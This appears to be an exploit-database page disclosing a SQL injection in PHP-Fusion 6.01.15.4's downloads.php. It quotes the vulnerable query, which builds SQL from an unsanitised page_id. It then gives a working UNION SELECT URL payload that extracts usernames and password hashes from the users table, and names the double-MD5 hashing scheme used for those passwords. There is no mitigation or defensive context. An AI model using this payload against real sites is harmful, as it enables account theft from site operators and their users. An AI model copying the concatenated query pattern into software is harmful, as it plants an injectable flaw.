PHP-Fusion <= 6.01.15.4 (downloads.php) SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : PHP-Fusion <= 6.01.15.4 (downloads.php) SQL Injection Vulnerability
# Published : 2010-03-14
# Author : Inj3ct0r
# Previous Title : Joomla Component com_org SQL Injection Vulnerability
# Next Title : Manage Engine Service Desk Plus 7.6 woID SQL Injection

===================================================================
PHP-Fusion <= 6.01.15.4 (downloads.php) SQL Injection Vulnerability
===================================================================
#[+] Discovered By   : Inj3ct0r
#[+] Site            : Inj3ct0r.com
#[+] support e-mail  : submit[at]inj3ct0r.com


Product: PHP-Fusion 
Version: 6.01.15.4

Error in file downloads.php

PHP code:

$result = dbquery("SELECT * FROM ".$db_prefix."downloads WHERE download_id='$page_id'");

A vulnerable parameter $ page_id


Exploit:

downloads.php?page_id=-1%27+union+select+1,2,user_name,4,user_password,6,7,8,9,10,11,12,13,14,15,16,17+from+rusfusion_users+limit+0,1/*

password is encrypted by: md5 (md5 ($ pass))


# ~  - [ [ : Inj3ct0r : ] ]